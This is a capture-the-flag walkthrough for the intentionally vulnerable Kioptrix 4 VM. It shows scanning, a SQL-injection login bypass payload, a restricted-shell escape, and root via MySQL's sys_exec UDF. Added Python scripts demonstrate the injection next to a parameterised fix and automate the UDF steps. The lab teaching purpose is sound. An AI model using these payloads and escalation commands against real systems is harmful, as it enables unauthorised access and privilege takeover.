Rooting Kioptrix 4 Walkthrough

Overview

Kioptrix 4 is a Boot2Root (B2R) VM designed for students to practice vulnerability analysis and exploitation. The objective is to root the virtual machine by chaining the vulnerabilities below into a full system compromise.

Vulnerabilities Exploited:

  • SQL injection in the website login (admin) panel
  • Website user password reused for SSH
  • Website connected to the MySQL database as root with an empty password
  • Operating-system command execution from MySQL through the lib_mysqludf_sys.so UDF

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Kioptrix 4 in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap

Reconnaissance/Scanning

#netdiscover

_____________________________________________________________________________
IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.8.100   84:3a:4b:5c:f5:54      1      60  Intel Corporate
192.168.8.108   00:0c:29:89:0d:50      1      60  VMware, Inc.
192.168.8.1     14:a5:1a:c3:5a:cc     14     840  HUAWEI TECHNOLOGIES CO.,LTD
 

Target VM IP Address: 192.168.8.108

Let's scan the target box with nmap to find open ports and the services listening on them.

root@kali:~# nmap -p- -A 192.168.8.108
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-30 07:57 EDT
Nmap scan report for 192.168.8.108
Host is up (0.00035s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:89:0D:50 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Host script results:
|_clock-skew: mean: 6h59m58s, deviation: 2h49m43s, median: 4h59m57s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2018-05-30T12:58:29-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.8.108
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.70 seconds
 

Nmap Findings:

  • Target box is a Linux (Ubuntu) machine
  • SSH (OpenSSH 4.7p1) on port 22
  • Website (Apache 2.2.8 / PHP 5.2.4) on port 80
  • Samba 3.0.28a on ports 139/445

The website on port 80 has a login form. It is vulnerable to SQL injection: the classic payload in the password field (username:password below) bypasses authentication, but there is no page for a user account called "admin".

admin:garbag' or 1=1 -- -

So we need to enumerate user accounts first. Samba allows null sessions (see the smb-security-mode output above), so let's use enum4linux.

root@kali:~# enum4linux 192.168.8.108

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 30 08:12:46 2018
 
==========================
|    Target Information    |
==========================
Target ........... 192.168.8.108
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 
 
=====================================================
|    Enumerating Workgroup/Domain on 192.168.8.108    |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
 
=============================================
|    Nbtstat Information for 192.168.8.108    |
=============================================
Looking up status of 192.168.8.108
KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
 
MAC Address = 00-00-00-00-00-00
 
======================================
|    Session Check on 192.168.8.108    |
======================================
[+] Server 192.168.8.108 allows sessions using username '', password ''
 
============================================
|    Getting domain SID for 192.168.8.108    |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
 
=======================================
|    OS information on 192.168.8.108    |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.8.108 from smbclient:
[+] Got OS info for 192.168.8.108 from srvinfo:
KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id     :  500
os version      :    4.9
server type     :    0x809a03
 
==============================
|    Users on 192.168.8.108    |
==============================
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody   Name: nobody   Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert    Name: ,,,             Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root        Name: root         Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john        Name: ,,,             Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret            Name: loneferret,,,          Desc: (null)
 
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
...

Three regular user accounts: john, robert and loneferret (plus root and nobody).

Exploitation

Let's bypass authentication again, this time with the username john.

john:garbag' or 1=1 -- -

The page returned for john reveals his credentials. Let's try the same password over SSH.

root@kali:~# ssh john@192.168.8.108
The authenticity of host '192.168.8.108 (192.168.8.108)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.8.108' (RSA) to the list of known hosts.
john@192.168.8.108's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ python -c "import pty; pty.spawn('/bin/bash');"
*** forbidden syntax -> "python -c "import pty; pty.spawn('/bin/bash');""
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
john:~$
 

We land in a restricted shell (lshell, branded "LigGoat Shell"); commands such as python are forbidden.
A well-known lshell escape is echo os.system("/bin/bash"), which drops us into an unrestricted bash:

john:~$ echo os.system("/bin/bash")
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=115(admin),1001(john)
john@Kioptrix4:~$
 

Privilege Escalation

So our next step is to root the box. Let's look for lib_mysqludf_sys, Bernardo Damele's UDF library (see References): once registered in MySQL as a user-defined function, it lets SQL statements execute operating-system commands with the privileges of the mysqld process.

john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
john@Kioptrix4:~$

The database credentials are in /var/www/checklogin.php. Note that only $myusername is passed through mysql_real_escape_string(); $mypassword goes into the query raw, which is exactly the injection point used above.

john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
 
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
 
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
 
// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);
 
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);
 
// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
 
if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}
 
ob_end_flush();
?>
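The following is an added example, not code from the original post or from the Kioptrix VM. It reproduces the query logic of checklogin.php in Python against an in-memory SQLite table (the member rows are constructed; the real table contents are not shown on the page) and puts the vulnerable query next to a parameterised one. The escaping helper stands in for mysql_real_escape_string(), using SQLite's quote-doubling rule instead of MySQL's backslash escaping.

```python
import sqlite3

# Constructed sample rows standing in for the members table on the box
# (the real rows are not shown in the walkthrough).
SAMPLE_MEMBERS = [
    ("john", "correcthorsebattery"),
    ("robert", "staple"),
]

PAYLOAD = "garbag' or 1=1 -- -"   # the password-field payload from the walkthrough


def escape_like_php(value: str) -> str:
    """Stand-in for mysql_real_escape_string() on the username.

    SQLite escapes a quote by doubling it rather than with a backslash,
    but the effect is the same: the quote can no longer end the literal.
    """
    return value.replace("'", "''")


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_MEMBERS)
    return conn


def vulnerable_login(conn, username, password):
    """Mirrors checklogin.php: username escaped, password spliced in raw."""
    sql = "SELECT * FROM members WHERE username='%s' and password='%s'" % (
        escape_like_php(username), password)
    rows = conn.execute(sql).fetchall()
    return len(rows) != 0, rows          # same $count!=0 test as the PHP


def safe_login(conn, username, password):
    """Hardened form: both inputs bound as parameters, never spliced into SQL."""
    rows = conn.execute(
        "SELECT * FROM members WHERE username=? AND password=?",
        (username, password)).fetchall()
    return len(rows) != 0, rows


if __name__ == "__main__":
    db = make_db()
    # Injection in the password field: "or 1=1" makes every row match and
    # "-- -" comments out the closing quote, so the check passes even for
    # a username that does not exist in the table.
    print("john  / payload      ->", vulnerable_login(db, "john", PAYLOAD))
    print("admin / payload      ->", vulnerable_login(db, "admin", PAYLOAD))
    # The same payload in the username field is neutralised by the escaping.
    print("payload / garbag     ->", vulnerable_login(db, PAYLOAD, "garbag"))
    # Parameterised query: the payload is just a wrong password.
    print("john  / payload safe ->", safe_login(db, "john", PAYLOAD))
```

The admin case is why the first attempt "worked" yet showed nothing: the query returns every row, so $count is non-zero and the PHP redirects to login_success.php?username=admin, but no such member exists. Moving the payload into the username field fails because that field is escaped, which is why it has to go into the password field on this box.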
 

So the web application connects to MySQL as root with an empty password.
Let's log in to MySQL and use sys_exec() to add john to the admin group, which has sudo rights on Ubuntu. The usermod runs with the privileges of the mysqld process, so this only works because mysqld runs as root on this box.

john@Kioptrix4:/var/www$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 28
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 |
+--------------------------------------+
1 row in set (0.01 sec)
 
mysql> exit
Bye

Let's confirm root access (sudo reads group membership from /etc/group, so no new login is needed).

john@Kioptrix4:/var/www$ sudo su
[sudo] password for john:
root@Kioptrix4:/var/www# whoami
root
root@Kioptrix4:/var/www# id
uid=0(root) gid=0(root) groups=0(root)
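As an added example that is not part of the original post, the script below wraps the UDF step with the checks a practitioner would want before repeating it on another box: whether sys_exec/sys_eval are already registered in mysql.func (CREATE FUNCTION fails on a duplicate name), which user the commands will run as (sys_eval('id'), since a UDF only gives you the mysqld user's privileges), and the MySQL 5.0 versus 5.1+ difference in where the .so must live. The facts it relies on come from the transcript (MySQL 5.0.51a, root with an empty password, /usr/lib/lib_mysqludf_sys.so); the function names sys_exec and sys_eval are the ones exported by lib_mysqludf_sys; the helper names and the sample mysql.func output are assumptions.

```python
import subprocess

LIB = "lib_mysqludf_sys.so"


def sql_string(value: str) -> str:
    """Quote a value as a MySQL string literal (embedded quotes doubled)."""
    return "'" + value.replace("'", "''") + "'"


def parse_func_table(batch_output: str) -> dict:
    """Parse `mysql -B -N -e "SELECT name, dl FROM mysql.func"` output.

    -B gives tab-separated rows and -N drops the header line, so each
    remaining line is "<function name>\\t<shared object>".
    """
    registered = {}
    for line in batch_output.splitlines():
        if not line.strip():
            continue
        name, dl = line.split("\t", 1)
        registered[name] = dl
    return registered


def plan_statements(server_version: str, registered: dict,
                    command: str, lib: str = LIB) -> list:
    """Build the SQL needed to run `command` through the UDF."""
    major_minor = tuple(int(x) for x in server_version.split("-")[0].split(".")[:2])
    stmts = []
    if major_minor >= (5, 1):
        # 5.1+ loads UDFs only from plugin_dir. 5.0 has no such variable and
        # dlopen()s the bare SONAME through the dynamic linker's search path,
        # which is why /usr/lib/lib_mysqludf_sys.so is loadable on this box.
        stmts.append("SELECT @@plugin_dir;")
    if "sys_exec" not in registered:
        stmts.append("CREATE FUNCTION sys_exec RETURNS INT SONAME %s;" % sql_string(lib))
    if "sys_eval" not in registered:
        stmts.append("CREATE FUNCTION sys_eval RETURNS STRING SONAME %s;" % sql_string(lib))
    # Whose privileges do we actually get? Only useful if this says uid=0.
    stmts.append("SELECT sys_eval('id');")
    # sys_exec returns the command's exit status; 0 means usermod succeeded.
    stmts.append("SELECT sys_exec(%s);" % sql_string(command))
    return stmts


def run_mysql(sql: str, user: str = "root", password: str = "") -> str:
    """Run SQL through the mysql CLI. An empty password means no -p at all."""
    cmd = ["mysql", "-u", user, "-B", "-N", "-e", sql]
    if password:
        cmd.insert(3, "-p" + password)
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Constructed sample of what mysql.func looks like when both functions
    # are already registered, as they are on Kioptrix 4.
    sample = "sys_exec\tlib_mysqludf_sys.so\nsys_eval\tlib_mysqludf_sys.so\n"
    for stmt in plan_statements("5.0.51a-3ubuntu5.4", parse_func_table(sample),
                                "usermod -a -G admin john"):
        print(stmt)
    # On the target itself, replace the sample with live data:
    #   registered = parse_func_table(run_mysql("SELECT name, dl FROM mysql.func"))
    #   version = run_mysql("SELECT VERSION()").strip()
    #   for stmt in plan_statements(version, registered, "usermod -a -G admin john"):
    #       print(stmt, "->", run_mysql(stmt).strip())
```

Whatever sys_exec returns, confirm the result out of band with getent group admin before trying sudo; if sys_eval('id') does not report uid=0, the UDF gives you a shell as the mysqld user only and a different escalation path is needed.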

 

roooooooooootz:)

References

https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html
